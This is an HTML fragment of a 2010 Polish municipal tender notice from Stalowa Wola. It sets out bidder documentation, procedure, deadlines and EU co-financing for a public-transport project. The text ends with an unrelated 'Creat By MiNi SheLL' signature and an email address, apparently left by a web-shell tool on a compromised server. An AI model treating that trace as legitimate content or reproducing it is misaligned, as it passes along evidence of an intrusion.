<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1.	wykaz urządzeń wchodzących w skład systemu wraz z ich opisem.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. formularz ofertowy - wypełniony i podpisany przez Wykonawcę - załącznik nr 2;
2. oświadczenie, o  spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych - załącznik nr 3;
3. oświadczenie że system jest produkowany seryjnie tj. wyprodukowany w co najmniej 100 egzemplarzach w krajach Unii Europejskiej
4. parafowany wzór umowy - załącznik nr 4.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. 	Wszystkie zmiany niniejszej umowy mogą być dokonywane za zgodą obu stron wyrażoną na piśmie pod rygorem nieważności.
2. 	Niedopuszczalne są takie zmiany postanowień umowy oraz wprowadzenie do niej nowych postanowień niekorzystnych dla Zamawiającego, jeżeli przy ich uwzględnieniu należałoby zmienić treść oferty Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.stalowawola.pl/?c=mdTresc-cmPokaz-1202<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Stalowa Wola 
ul. Wolności 7,
37-450 Stalowa Wola
pokój nr 9 /parter/.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.08.2010 godzina 12:00, miejsce: Urząd Miasta Stalowa Wola 
ul. Wolności 7,
37-450 Stalowa Wola
pokój nr 9 /parter/.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> PROJEKT WSPÓŁFINANSOWANY PRZEZ UNIĘ EUROPEJSKĄ W RAMACH DZIAŁANIA 2.1 /INFRASTRUKTURA KOMUNIKACYJNA, 
SCHEMAT D-TRANSPORT PUBLICZNY/ REGIONALNEGO PROGRAMU OPERACYJNEGO WOJEWÓDZTWA PODKARPACKIEGO NA LATA 2007-2013
PN. /URUCHOMIENIE NOWYCH LINII KOMUNIKACYJNYCH NA OBSZARZE WIEJSKIM ORAZ ZAKUP NOWOCZESNEGO TABORU I INFRASTRUKTURY TECHNICZNEJ DLA ZAKŁADU MIEJSKIEJ KOMUNIKACJI SAMOCHODOWEJ 
W STALOWEJ WOLI/ - NR RPPK.02.01.00-18-006/09..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com